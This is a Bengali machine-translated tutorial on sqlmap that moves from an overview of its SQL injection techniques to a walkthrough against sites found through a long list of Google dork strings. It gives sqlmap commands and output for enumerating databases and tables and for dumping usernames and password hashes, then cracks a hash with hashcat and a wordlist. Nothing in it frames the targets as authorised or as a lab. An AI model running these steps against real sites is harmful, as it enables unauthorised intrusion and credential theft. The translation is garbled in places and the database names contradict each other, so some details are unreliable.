SQLMAP-এসকিউএল ইনজেকশন সনাক্ত করা এবং শোষণ করা- একটি বিশদ ব্যাখ্যা

0 comment 111 views

Sqlmap হল একটি ওপেন সোর্স পেনিট্রেশন টেস্টিং টুল যা এসকিউএল ইনজেকশনের ত্রুটিগুলি সনাক্তকরণ এবং শোষণ করার এবং ডাটাবেস সার্ভারের দখল নেওয়ার প্রক্রিয়াটিকে স্বয়ংক্রিয় করে।

এটি একটি শক্তিশালী শনাক্তকরণ ইঞ্জিনের সাথে আসে, চূড়ান্ত অনুপ্রবেশ পরীক্ষকের জন্য অনেকগুলি বিশেষ বৈশিষ্ট্য এবং ডাটাবেস ফিঙ্গারপ্রিন্টিং, ডাটাবেস থেকে ডেটা আনয়ন, অন্তর্নিহিত ফাইল সিস্টেম অ্যাক্সেস করা এবং আউট-এর মাধ্যমে অপারেটিং সিস্টেমে কমান্ড কার্যকর করা থেকে স্থায়ী সুইচগুলির একটি বিস্তৃত পরিসর। অফ-ব্যান্ড সংযোগ।

টুলের ভবিষ্যত:

  • MySQL, Oracle, PostgreSQL, Microsoft SQL সার্ভার, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB এবং Informix ডাটাবেস ম্যানেজমেন্ট সিস্টেমের জন্য সম্পূর্ণ সমর্থন ।
  • ছয়টি এসকিউএল ইনজেকশন কৌশলগুলির জন্য সম্পূর্ণ সমর্থন: বুলিয়ান-ভিত্তিক অন্ধ, সময়-ভিত্তিক অন্ধ, ত্রুটি-ভিত্তিক, UNION ক্যোয়ারী-ভিত্তিক, স্ট্যাক করা প্রশ্ন এবং আউট-অফ-ব্যান্ড ।
  • ডিবিএমএস শংসাপত্র, আইপি ঠিকানা, পোর্ট এবং ডাটাবেসের নাম প্রদান করে এসকিউএল ইনজেকশনের মাধ্যমে পাস না করে সরাসরি ডাটাবেসের সাথে সংযোগ করতে সমর্থন ।
  • ব্যবহারকারী, পাসওয়ার্ড হ্যাশ, বিশেষাধিকার, ভূমিকা, ডাটাবেস, টেবিল এবং কলাম গণনা করার জন্য সমর্থন ।
  • পাসওয়ার্ড হ্যাশ ফরম্যাটগুলির স্বয়ংক্রিয় স্বীকৃতি এবং অভিধান-ভিত্তিক আক্রমণ ব্যবহার করে তাদের ক্র্যাক করার জন্য সমর্থন ।
  • ডাটাবেস টেবিল সম্পূর্ণরূপে ডাম্প করতে সমর্থন , ব্যবহারকারীর পছন্দ অনুযায়ী এন্ট্রি বা নির্দিষ্ট কলামের একটি পরিসীমা। ব্যবহারকারী প্রতিটি কলামের এন্ট্রি থেকে শুধুমাত্র কয়েকটি অক্ষর ডাম্প করতে বেছে নিতে পারেন।
  • নির্দিষ্ট ডাটাবেসের নাম, সমস্ত ডাটাবেস জুড়ে নির্দিষ্ট টেবিল বা সমস্ত ডাটাবেসের টেবিল জুড়ে নির্দিষ্ট কলাম অনুসন্ধানের জন্য সমর্থন । এটি উপযোগী, উদাহরণস্বরূপ, কাস্টম অ্যাপ্লিকেশন শংসাপত্র সম্বলিত সারণী সনাক্ত করতে যেখানে প্রাসঙ্গিক কলামের নামের মধ্যে নাম এবং পাসের মতো স্ট্রিং থাকে।
  • ডাটাবেস সফ্টওয়্যার MySQL, PostgreSQL বা Microsoft SQL সার্ভার হলে ডাটাবেস সার্ভারের অন্তর্নিহিত ফাইল সিস্টেম থেকে যেকোনো ফাইল ডাউনলোড এবং আপলোড করতে সহায়তা করে ।
  • ডাটাবেস সফ্টওয়্যার মাইএসকিউএল, পোস্টগ্রেএসকিউএল বা মাইক্রোসফ্ট এসকিউএল সার্ভার হলে স্বেচ্ছাচারী কমান্ড চালানো এবং ডাটাবেস সার্ভারের অন্তর্নিহিত অপারেটিং সিস্টেমে তাদের স্ট্যান্ডার্ড আউটপুট পুনরুদ্ধার করতে সহায়তা করে ।
  • আক্রমণকারী মেশিন এবং ডাটাবেস সার্ভারের অন্তর্নিহিত অপারেটিং সিস্টেমের মধ্যে একটি আউট-অফ-ব্যান্ড স্টেটফুল TCP সংযোগ স্থাপনের জন্য সমর্থন । ব্যবহারকারীর পছন্দ অনুযায়ী এই চ্যানেলটি একটি ইন্টারেক্টিভ কমান্ড প্রম্পট, একটি মিটারপ্রেটার সেশন বা একটি গ্রাফিক্যাল ইউজার ইন্টারফেস (VNC) সেশন হতে পারে।
  • Metasploit এর Meterpreter কমান্ডের মাধ্যমে ডাটাবেস প্রক্রিয়ার ব্যবহারকারীর বিশেষাধিকার বৃদ্ধির জন্য সমর্থন ।getsystem

কৌশল:

sqlmap পাঁচটি ভিন্ন SQL ইনজেকশন প্রকার সনাক্ত করতে এবং শোষণ করতে সক্ষম :

বুলিয়ান-ভিত্তিক অন্ধ :

  • sqlmap HTTP অনুরোধে প্রভাবিত পরামিতি প্রতিস্থাপন করে বা যুক্ত করে, একটি SELECTসাব-স্টেটমেন্ট ধারণকারী একটি সিনট্যাটিকভাবে বৈধ SQL স্টেটমেন্ট স্ট্রিং, বা অন্য কোনো SQL স্টেটমেন্ট যার ব্যবহারকারী আউটপুট পুনরুদ্ধার করতে চান।
  • প্রতিটি HTTP প্রতিক্রিয়ার জন্য, মূল অনুরোধের সাথে HTTP প্রতিক্রিয়া শিরোনাম/বডির মধ্যে তুলনা করে, টুলটি অক্ষর অনুসারে ইনজেকশন করা বিবৃতি অক্ষরের আউটপুট অনুমান করে। বিকল্পভাবে, ব্যবহারকারী একটি স্ট্রিং বা রেগুলার এক্সপ্রেশন প্রদান করতে পারে যাতে ট্রু পেজে মিল থাকে।
  • এই কৌশলটি সম্পাদন করার জন্য sqlmap-এ প্রয়োগ করা দ্বিখণ্ডিত অ্যালগরিদম সর্বোচ্চ সাতটি HTTP অনুরোধ সহ আউটপুটের প্রতিটি অক্ষর আনতে সক্ষম।
  • যেখানে আউটপুট পরিষ্কার-টেক্সট প্লেইন অক্ষরসেটের মধ্যে নেই, সেখানে আউটপুট সনাক্ত করতে sqlmap অ্যালগরিদমকে বড় পরিসরের সাথে মানিয়ে নেবে।

সময় ভিত্তিক অন্ধ :

  • sqlmap HTTP অনুরোধে প্রভাবিত প্যারামিটারের সাথে প্রতিস্থাপন করে বা যুক্ত করে, একটি সিনট্যাক্টিক্যালি বৈধ SQL স্টেটমেন্ট স্ট্রিং যাতে একটি প্রশ্ন থাকে যা একটি নির্দিষ্ট সংখ্যক সেকেন্ডের জন্য ফিরে আসার জন্য ব্যাক-এন্ড DBMS কে আটকে রাখে।
  • প্রতিটি HTTP প্রতিক্রিয়ার জন্য, মূল অনুরোধের সাথে HTTP প্রতিক্রিয়া সময়ের মধ্যে একটি তুলনা করে, টুলটি অক্ষর অনুসারে ইনজেকশনের বিবৃতি অক্ষরের আউটপুট অনুমান করে। বুলিয়ান-ভিত্তিক কৌশলের মতো, দ্বিখণ্ডিত অ্যালগরিদম প্রয়োগ করা হয়।

ত্রুটি-ভিত্তিক :

  • sqlmap প্রভাবিত প্যারামিটারের সাথে প্রতিস্থাপন করে বা যুক্ত করে একটি ডাটাবেস-নির্দিষ্ট ত্রুটি বার্তা উদ্দীপক বিবৃতি এবং HTTP প্রতিক্রিয়া শিরোনাম এবং বডি পার্স করে ডিবিএমএস ত্রুটি বার্তাগুলির অনুসন্ধানে যেখানে অক্ষরগুলির ইনজেকশন করা পূর্ব-সংজ্ঞায়িত চেইন এবং এর মধ্যে সাবকুয়েরি স্টেটমেন্ট আউটপুট রয়েছে।
  • এই কৌশলটি তখনই কাজ করে যখন ওয়েব অ্যাপ্লিকেশনটিকে ব্যাক-এন্ড ডাটাবেস ম্যানেজমেন্ট সিস্টেম ত্রুটি বার্তা প্রকাশ করার জন্য কনফিগার করা হয়েছে।

UNION প্রশ্ন-ভিত্তিক :

  • sqlmap প্রভাবিত প্যারামিটারের সাথে একটি সিনট্যাক্টিক্যালি বৈধ এসকিউএল স্টেটমেন্ট যুক্ত করে একটি UNION ALL SELECT. এই কৌশলটি কাজ করে যখন ওয়েব অ্যাপ্লিকেশন পৃষ্ঠাটি সরাসরি বিবৃতির আউটপুটকে SELECTএকটি forলুপের মধ্যে বা অনুরূপ পাস করে, যাতে ক্যোয়ারী আউটপুটের প্রতিটি লাইন পৃষ্ঠার সামগ্রীতে মুদ্রিত হয়।
  • sqlmap এছাড়াও আংশিক (একক এন্ট্রি) UNION ক্যোয়ারী SQL ইনজেকশন দুর্বলতাগুলিকে কাজে লাগাতে সক্ষম যা ঘটে যখন স্টেটমেন্টের আউটপুট একটি গঠনে সাইকেল করা হয় না for, যেখানে শুধুমাত্র ক্যোয়ারী আউটপুটের প্রথম এন্ট্রি প্রদর্শিত হয়।

স্ট্যাক করা প্রশ্ন:

  • পিগি ব্যাকিং নামেও পরিচিত : sqlmap পরীক্ষা করে যদি ওয়েব অ্যাপ্লিকেশনটি স্ট্যাক করা প্রশ্নগুলিকে সমর্থন করে এবং তারপরে, যদি এটি সমর্থন করে তবে এটি HTTP অনুরোধে প্রভাবিত প্যারামিটারের সাথে যুক্ত হয়, একটি সেমি-কোলন ( ;) এর পরে SQL স্টেটমেন্টটি কার্যকর করা হবে।
  • এই কৌশলটি এসকিউএল স্টেটমেন্টগুলি চালানোর জন্য উপযোগী SELECT, যেমন উদাহরণস্বরূপ, ডেটা সংজ্ঞা বা ডেটা ম্যানিপুলেশন স্টেটমেন্ট, সম্ভবত ফাইল সিস্টেম রিড এবং রাইট অ্যাক্সেস এবং অপারেটিং সিস্টেম কমান্ড এক্সিকিউশনের দিকে পরিচালিত করে যা অন্তর্নিহিত ব্যাক-এন্ড ডাটাবেস ম্যানেজমেন্ট সিস্টেম এবং সেশন ব্যবহারকারীর উপর নির্ভর করে। বিশেষাধিকার

একটি দুর্বল ওয়েবসাইট খুঁজুন:

এটি সাধারণত সবচেয়ে কঠিন বিট এবং অন্য যেকোনো পদক্ষেপের চেয়ে বেশি সময় নেয়। যারা Google Dorks ব্যবহার করতে জানেন তারা ইতিমধ্যেই এটি জানেন, কিন্তু আপনি যদি না করেন তবে আমি অনেকগুলি স্ট্রিং একসাথে রেখেছি যা আপনি Google এ অনুসন্ধান করতে পারেন। শুধু Google-এ যেকোনো লাইন কপি পেস্ট করুন এবং Google আপনাকে অনেকগুলি অনুসন্ধান ফলাফল দেখাবে।

গুগল ডর্ক:

একজন Google dork হল একজন কর্মচারী যিনি অজান্তে ইন্টারনেটে সংবেদনশীল কর্পোরেট তথ্য প্রকাশ করেন। ডর্ক শব্দটি একজন ধীর-বুদ্ধিসম্পন্ন বা অদক্ষ ব্যক্তির জন্য অপবাদ।

Google dorks কর্পোরেট তথ্যকে ঝুঁকির মধ্যে ফেলে কারণ তারা অনিচ্ছাকৃতভাবে পিছনের দরজা তৈরি করে যা আক্রমণকারীকে অনুমতি ছাড়াই একটি নেটওয়ার্কে প্রবেশ করতে এবং/অথবা অননুমোদিত তথ্যে অ্যাক্সেস পেতে দেয়। সংবেদনশীল তথ্য সনাক্ত করতে, আক্রমণকারীরা গুগল ডর্ক কোয়েরি নামে উন্নত অনুসন্ধান স্ট্রিং ব্যবহার করে।

Google Dorks স্ট্রিংগুলি দুর্বল SQLMAP SQL ইনজেক্টেবল ওয়েবসাইট খুঁজে পেতে:

Google Dork স্ট্রিং কলাম 1 Google Dork স্ট্রিং কলাম 2 গুগল ডর্ক স্ট্রিং কলাম 3
inurl:item_id= inurl:review.php?id= inurl:hosting_info.php?id=
inurl:newsid= inurl: effort.php? in = inurl:gallery.php?id=
inurl:trainers.php?id= inurl:curriculum.php?id= inurl:rub.php?idr=
inurl:news-full.php?id= inurl:labels.php?id= inurl:view_faq.php?id=
inurl:news_display.php?getid= inurl:story.php?id= inurl: artikelinfo.php?id =
inurl:index2.php?option= inurl:look.php?ID= inurl:detail.php?ID=
inurl:readnews.php?id= inurl:newsone.php?id= inurl:index.php?=
inurl:top10.php?cat= inurl:aboutbook.php?id= inurl:profile_view.php?id=
inurl:newsone.php?id= inurl:material.php?id= inurl:category.php?id=
inurl:event.php?id= inurl:opinions.php?id= inurl:publications.php?id=
inurl:product-item.php?id= inurl:announce.php?id= inurl:fellows.php?id=
inurl:sql.php?id= inurl:rub.php?idr= inurl:downloads_info.php?id=
inurl:index.php?catid= inurl:gallery_info.php?l= inurl:prod_info.php?id=
inurl:news.php?catid= inurl:tekst.php?idt= inurl:shop.php?do=part&id=
inurl:index.php?id= inurl:newscat.php?id= inurl:productinfo.php?id=
inurl:news.php?id= inurl:newsticker_info.php?idn= inurl:collectionitem.php?id=
inurl:index.php?id= inurl:rubrika.php?idr= inurl:band_info.php?id=
inurl:trainers.php?id= inurl:rubp.php?idr= inurl:product.php?id=
inurl:buy.php?category= inurl:offer.php?idf= inurl:releases.php?id=
inurl:article.php?ID= inurl:art.php?idm= inurl:ray.php?id=
inurl:play_old.php?id= inurl:title.php?id= inurl:product.php?id=
inurl:declaration_more.php?decl_id= inurl:news_view.php?id= inurl:pop.php?id=
inurl:pageid= inurl:select_biblio.php?id= inurl:shopping.php?id=
inurl:games.php?id= inurl:humor.php?id= inurl:productdetail.php?id=
inurl:page.php?file= inurl:aboutbook.php?id= inurl:post.php?id=
inurl:newsDetail.php?id= inurl: ogl_inet.php?ogl_id = inurl:viewshowdetail.php?id=
inurl:gallery.php?id= inurl:fiche_spectacle.php?id= inurl:clubpage.php?id=
inurl:article.php?id= inurl:communique_detail.php?id= inurl:memberInfo.php?id=
inurl:show.php?id= inurl: sem.php3?id = inurl:section.php?id=
inurl:staff_id= inurl:kategorie.php4?id= inurl:theme.php?id=
inurl:newsitem.php?num= inurl:news.php?id= inurl:page.php?id=
inurl:readnews.php?id= inurl:index.php?id= inurl:shredder-categories.php?id=
inurl:top10.php?cat= inurl:faq2.php?id= inurl:tradeCategory.php?id=
inurl:historialer.php?num= inurl:show_an.php?id= inurl:product_ranges_view.php?ID=
inurl:react.php?num= inurl:preview.php?id= inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num= inurl:loadpsb.php?id= inurl: transscript.php?id=
inurl:forum_bds.php?num= inurl:opinions.php?id= inurl: channel_id=
inurl:game.php?id= inurl:spr.php?id= inurl:aboutbook.php?id=
inurl:view_product.php?id= inurl:pages.php?id= inurl:preview.php?id=
inurl:newsone.php?id= inurl:announce.php?id= inurl:loadpsb.php?id=
inurl:sw_comment.php?id= inurl:clanek.php4?id= inurl:pages.php?id=
inurl:news.php?id= inurl:participant.php?id=  about.php?cartID=
inurl: avd_start.php? avd = inurl:download.php?id=  accinfo.php?cartId=
inurl:event.php?id= inurl:main.php?id=  add-to-cart.php?ID=
inurl:product-item.php?id= inurl:review.php?id=  addToCart.php?idProduct=
inurl:sql.php?id= inurl:chappies.php?id=  addtomylist.php?ProdId=
inurl:material.php?id= inurl:read.php?id=
inurl:clanek.php4?id= inurl:prod_detail.php?id=
inurl:announce.php?id= inurl:viewphoto.php?id=
inurl:chappies.php?id= inurl:article.php?id=
inurl:read.php?id= inurl:person.php?id=
inurl:viewapp.php?id= inurl:productinfo.php?id=
inurl:viewphoto.php?id= inurl:showimg.php?id=
inurl:rub.php?idr= inurl:view.php?id=
inurl:gallery_info.php?l= inurl:website.php?id=

 

ধাপ 1: ওয়েবসাইট SQLMAP SQL ইনজেকশনের জন্য ঝুঁকিপূর্ণ কিনা তা নিশ্চিত করতে প্রাথমিক পরীক্ষা করুন

উপরের প্রতিটি স্ট্রিং শোয়ের জন্য, আপনি শত শত অনুসন্ধান ফলাফল পাবেন। আপনি কিভাবে জানেন যে কোনটি সত্যিই SQLMAP SQL ইনজেকশনের জন্য ঝুঁকিপূর্ণ। একাধিক উপায় আছে এবং আমি নিশ্চিত যে লোকেরা তর্ক করবে কোনটি সেরা কিন্তু আমার কাছে নিম্নলিখিতটি সবচেয়ে সহজ এবং সবচেয়ে চূড়ান্ত।

ধরা যাক আপনি এই স্ট্রিংটি ব্যবহার করে অনুসন্ধান করেছেন inurl:item_id= এবং গুগল অনুসন্ধান ফলাফলগুলির মধ্যে একটি এইরকম একটি ওয়েবসাইট দেখায়:

http://www.gbhackers.com/products_showitem_clemco.php?item_id=28434

URL-এর শেষে শুধু একটি একক উদ্ধৃতি চিহ্ন যোগ করুন। (শুধু নিশ্চিত করার জন্য, ” একটি দ্বৈত উদ্ধৃতি চিহ্ন এবং ” ” একটি একক উদ্ধৃতি চিহ্ন)।

সুতরাং এখন আপনার URL এই মত হবে:

http://www.gbhackers.com/products_showitem_clemco.php?item_id=28434'

যদি পৃষ্ঠাটি একটি SQL ত্রুটি প্রদান করে, তাহলে পৃষ্ঠাটি SQLMAP SQL ইনজেকশনের জন্য ঝুঁকিপূর্ণ। যদি এটি আপনাকে একটি ভিন্ন পৃষ্ঠায় লোড বা পুনঃনির্দেশিত করে, আপনার Google অনুসন্ধান ফলাফল পৃষ্ঠার পরবর্তী সাইটে যান৷

স্ক্রিনশট নীচে উদাহরণ ত্রুটি দেখুন. আমি সুস্পষ্ট কারণে URL এবং পৃষ্ঠা ডিজাইন সহ সবকিছু অস্পষ্ট করেছি।

sqli-1

বিভিন্ন ডাটাবেস এবং ভাষা থেকে SQLi ত্রুটির উদাহরণ

মাইক্রোসফট এসকিউএল সার্ভার

‘/’ আপ্লিকেশনে সারভার এরর অক্ষর স্ট্রিং ‘আক্রমণ;’-এর আগে খোলা উদ্ধৃতি চিহ্ন।

বর্ণনা: বর্তমান ওয়েব অনুরোধটি কার্যকর করার সময় একটি অনাকাঙ্ক্ষিত ব্যতিক্রম ঘটেছে। কোডে যে ত্রুটির উদ্ভব হয়েছে সে সম্পর্কে আরও তথ্যের জন্য দয়া করে স্ট্যাক ট্রেসটি পর্যালোচনা করুন৷

ব্যতিক্রম বিবরণ: System.Data.SqlClient.SqlException: অক্ষর স্ট্রিং ‘আক্রমণ;’-এর আগে অপ্রকাশিত উদ্ধৃতি চিহ্ন।

মাইএসকিউএল ত্রুটি

সতর্কতা: mysql_fetch_array(): সরবরাহ করা যুক্তিটি 12 লাইনে /var/www/myawesomestore.com/buystuff.php-এ একটি বৈধ MySQL ফলাফল সংস্থান নয়

ত্রুটি: আপনার এসকিউএল সিনট্যাক্সে একটি ত্রুটি রয়েছে: 12 লাইনে ”” এর কাছাকাছি ব্যবহার করার জন্য সঠিক সিনট্যাক্সের জন্য আপনার MySQL সার্ভার সংস্করণের সাথে সম্পর্কিত ম্যানুয়ালটি পরীক্ষা করুন

ওরাকল ত্রুটি

java.sql.SQLException: ORA-00933: SQL কমান্ডটি oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) এ oracle.jdbc.ttc7.TTioer.processError

ত্রুটি: SQLExceptionjava.sql.SQLException: ORA-01756: উদ্ধৃত স্ট্রিং সঠিকভাবে শেষ করা হয়নি

PostgreSQL ত্রুটি

ক্যোয়ারী ব্যর্থ হয়েছে: ত্রুটি: “”'”-এ বা কাছাকাছি উদ্ধৃত স্ট্রিং অবসান হয়েছে

ধাপ 2: SQLMAP SQL ইনজেকশন ব্যবহার করে DBMS ডাটাবেস তালিকা করুন:

আপনি উপরের স্ক্রিনশট থেকে দেখতে পাচ্ছেন, আমি একটি SQLMAP SQL ইনজেকশন দুর্বল ওয়েবসাইট খুঁজে পেয়েছি। এখন আমাকে সেই দুর্বল ডাটাবেসের সমস্ত ডাটাবেস তালিকাভুক্ত করতে হবে। (এটিকে কলামের গণনা সংখ্যাও বলা হয়)। যেহেতু আমি SQLMAP ব্যবহার করছি, এটি আমাকে বলবে যে কোনটি দুর্বল।

আপনার দুর্বল ওয়েবসাইটে নিম্নলিখিত কমান্ডটি চালান।

sqlmap -u http://www.gbhackers.com/products_showitem_clemco.php?item_id=28434 --dbs

এখানে:
sqlmap = sqlmap বাইনারি ফাইলের নাম
-u = টার্গেট URL (যেমন “http://www.gbhackers.com/products_showitem_gbhac.php?item_id=28434”)
-dbs = DBMS ডেটাবেস গণনা করুন

নীচের স্ক্রিনশট দেখুন।

sqli-2

এই কমান্ডগুলি বেশ কয়েকটি আকর্ষণীয় তথ্য প্রকাশ করে:

web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: gbhackers
[10:55:56] [INFO] fetched data logged to text files under
 '/usr/share/sqlmap/output/www.gbhackers.com'


সুতরাং, আমাদের কাছে এখন দুটি ডাটাবেস রয়েছে যা আমরা দেখতে পারি। information_schema প্রায় প্রতিটি MYSQL ডাটাবেসের জন্য একটি আদর্শ ডাটাবেস। তাই আমাদের আগ্রহ clemcoindustries ডাটাবেসের উপর হবে।

ধাপ 3: SQLMAP SQL ইনজেকশন ব্যবহার করে টার্গেট ডাটাবেসের টেবিল তালিকা করুন:

এখন আমাদের জানতে হবে এই clemcoindustries ডাটাবেস কত টেবিল পেয়েছে এবং তাদের নাম কি। সেই তথ্য জানতে, নিম্নলিখিত কমান্ডটি ব্যবহার করুন:

sqlmap -u http://www.gbhackers.com/cgi-bin/item.cgi?item_id=15 -D 
clemcoindustries --tables

এই ডাটাবেস 8 টেবিল পেয়েছে.

[10:56:20] [INFO] fetching tables for database: 'gbhackers'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info

sqli-3

এবং অবশ্যই আমরা SQLMAP SQL Injection ব্যবহার করে user_info টেবিলের ভিতরে কী আছে তা পরীক্ষা করতে চাই কারণ সেই টেবিলে সম্ভবত ব্যবহারকারীর নাম এবং পাসওয়ার্ড রয়েছে।

ধাপ 4: SQLMAP SQL ইনজেকশন ব্যবহার করে নির্বাচিত ডাটাবেসের টার্গেট টেবিলে কলাম তালিকা করুন:

এখন আমাদের SQLMAP SQL Injection ব্যবহার করে clemcoindustries ডাটাবেসের user_info টার্গেট টেবিলের সমস্ত কলাম তালিকাভুক্ত করতে হবে। SQLMAP SQL ইনজেকশন এটি সত্যিই সহজ করে তোলে, নিম্নলিখিত কমান্ডটি চালান:

sqlmap -u http://www.gbhackers.com/cgi-bin/item.cgi?item_id=15 -D 
 gbhackers-T user_i 
nfo --columns

 

এটি clemcoindustries ডাটাবেসের টার্গেট টেবিল user_info থেকে 5টি এন্ট্রি প্রদান করে।

[10:57:16] [INFO] fetching columns for table 'user_info' in database 'gbhackers '
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)

This is exactly what we are looking for … target table user_login and user_password .

sqli-4

ধাপ 5: SQLMAP SQL ইনজেকশন ব্যবহার করে নির্বাচিত ডাটাবেসের টার্গেট টেবিলের টার্গেট কলাম থেকে ব্যবহারকারীর নাম তালিকাভুক্ত করুন:

SQLMAP এসকিউএল ইনজেকশন তৈরি করা সহজ! শুধু নিম্নলিখিত কমান্ড আবার চালান:

sqlmap -u http://www.gbhackers.com/cgi-bin/item.cgi?item_id=15 -D 
gbhackers-T user_info -C user_login --dump

 

অনুমান করুন কি, আমাদের এখন ডাটাবেস থেকে ব্যবহারকারীর নাম আছে:

[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes



sqli-5

প্রায় হয়ে গেছে, আমাদের এখন শুধুমাত্র এই ব্যবহারকারীর জন্য পাসওয়ার্ড প্রয়োজন.. পরবর্তী শুধু তা দেখায়..

ধাপ 6: SQLMAP SQL ইনজেকশন ব্যবহার করে নির্বাচিত ডাটাবেসের টার্গেট টেবিলের টার্গেট কলাম থেকে পাসওয়ার্ড বের করুন:

আপনি সম্ভবত SQLMAP SQL ইনজেকশন টুল ব্যবহার করতে অভ্যস্ত হচ্ছেন। ব্যবহারকারীর জন্য পাসওয়ার্ড বের করতে নিম্নলিখিত কমান্ডটি ব্যবহার করুন।

sqlmap -u http://www.gbhackers.com/cgi-bin/item.cgi?item_id=15 -D gbhackers-T 
user_info -C user_password --dump
আমরা পাসওয়ার্ড হ্যাশ করেছি: 24iYBc17xK0e
[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+
sqli-6

 

কিন্তু থামুন, এই পাসওয়ার্ড মজার দেখায়. এটি কারো পাসওয়ার্ড হতে পারে না.. যে কেউ তাদের ওয়েবসাইটকে এমনভাবে দুর্বল করে রাখে তার কাছে এরকম পাসওয়ার্ড থাকতে পারে না।

এটা একদম ঠিক। এটি একটি হ্যাশ করা পাসওয়ার্ড। এর অর্থ কী, পাসওয়ার্ডটি এনক্রিপ্ট করা হয়েছে এবং এখন আমাদের এটি ডিক্রিপ্ট করতে হবে।

আমি কালি লিনাক্স পোস্টে হ্যাশক্যাট সহ এই ক্র্যাকিং MD5, phpBB, MySQL এবং SHA1 পাসওয়ার্ডগুলিকে কীভাবে ব্যাপকভাবে পাসওয়ার্ড ডিক্রিপ্ট করতে হয় তা কভার করেছি। আপনি যদি এটি মিস করে থাকেন তবে আপনি অনেক কিছু মিস করছেন।

আমি এখানে সংক্ষেপে এটি কভার করব তবে আপনার সত্যিই হ্যাশক্যাট কীভাবে ব্যবহার করতে হয় তা শিখতে হবে।

ধাপ 7: পাসওয়ার্ড ক্র্যাক করা:

তাই হ্যাশ করা পাসওয়ার্ড হল 24iYBc17xK0e । . আপনি কিভাবে হ্যাশ যে ধরনের কি জানেন?

1. হ্যাশের ধরন সনাক্ত করুন:

সৌভাগ্যবশত, কালি লিনাক্স একটি চমৎকার টুল প্রদান করে এবং এটি কোন ধরনের হ্যাশ তা সনাক্ত করতে আমরা এটি ব্যবহার করতে পারি। কমান্ড লাইনে নিম্নলিখিত কমান্ড টাইপ করুন এবং প্রম্পটে হ্যাশ মান পেস্ট করুন:

হ্যাশ-শনাক্তকারী



sqli-7

চমৎকার। তাই এই DES(ইউনিক্স) হ্যাশ.

2. চুদাহাশক্যাট ব্যবহার করে হ্যাশ ক্র্যাক করুন:

DES হ্যাশের জন্য কোন কোড ব্যবহার করতে হবে তা সবার আগে জানতে হবে। তাই এর যে চেক করা যাক

cudahashcat --help | grep DES

sqli-8


সুতরাং এটি হয় 1500 বা 3100৷ কিন্তু এটি একটি MYSQL ডেটাবেস ছিল, তাই এটি অবশ্যই 1500 হতে হবে৷

আমি হ্যাশ মান 24iYBc17xK0e সংরক্ষণ করেছি । DES.hash ফাইলে। আমি যে কমান্ডটি চালাচ্ছি তা নিম্নরূপ:

cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

sqli-9

আকর্ষণীয় সন্ধান: সাধারণ হ্যাশক্যাট ডিইএস হ্যাশের কোড নির্ধারণ করতে অক্ষম ছিল। (এর সাহায্য মেনুতে নেই)। যাইহোক চুদাহ্যাশক্যাট এবং ওক্লহ্যাশক্যাট উভয়ই খুঁজে পেয়ে চাবিটি ফাটল।

যাইহোক , তাই এখানে ক্র্যাক করা পাসওয়ার্ড: abc123   24iYBc17xK0e। : abc123

আমরা এখন এই ব্যবহারকারীর জন্য পাসওয়ার্ড আছে.

Related Posts

Leave a Comment

* By using this form you agree with the storage and handling of your data by this website.

সদাই একাডেমি
সদাই একাডেমি একটি অনলাইন ভিডিও শেখার প্ল্যাটফর্ম। এথিক্যাল হ্যাকিং, এসইও, ওয়েব ডেভেলপিং শিখুন

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy
error: checked
UA-200779953-1